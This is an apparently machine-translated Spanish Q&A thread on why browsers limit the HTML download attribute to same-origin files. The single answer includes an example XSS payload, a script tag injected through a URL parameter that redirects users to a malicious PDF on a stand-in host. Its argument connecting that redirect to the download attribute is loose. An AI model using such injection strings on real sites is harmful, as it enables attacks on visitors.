Implicaciones de seguridad del atributo de descarga

7

El atributo de descarga en un elemento a le dice al navegador que obligue a la descarga de un archivo que de lo contrario sería interpretado por el navegador. Esto es muy conveniente, ya que a menudo los usuarios desean descargar un archivo (por ejemplo, jpg) en lugar de que el navegador lo visualice.

<a href="link.jpg" download="myfile.jpg">Click here to download</a>

Algunos navegadores bloquean el atributo download cuando no se accede al archivo por el mismo protocolo, en el mismo host y en el mismo puerto. Para mí, esto me parece un poco inútil, mientras que rompe muchos buenos casos de uso para evitar algo que pueda evitarse de otras maneras.

¿Cuáles son las implicaciones de seguridad que los navegadores intentan proteger? ¿Algún ejemplo real útil?

    
pregunta user1156544 08.08.2018 - 22:52
fuente

1 respuesta

0

Es importante no solo en el atributo a sino también en otros. La razón de esto es porque está buscando para ver si proviene del origen , lo que significa el mismo host y el mismo puerto que su sitio web.

si de alguna manera usted es vulnerable a un ataque que usa su sitio, lo bloqueará. Esto puede ser útil si un atacante usa, p. XSS para redirigir y hacer que un usuario descargue un archivo malicioso.    Temas tales como:

  • archivo PDF malicioso
  • Malware

    Como ejemplo:

  

www.super123site.com/hello.php?mesg=hello+world

Viene desde el mismo puerto que tu sitio ...

Escenario de ataque:

www.super123site.com/hello.php?mesg=<script> window.location.replace(www.malware.com:8099/maliciousPdf.pdf)</script>

Diferente host, diferentes puertos, Bloqueados ...

    
respondido por el Luis Carlos 14.09.2018 - 17:05
fuente

Lea otras preguntas en las etiquetas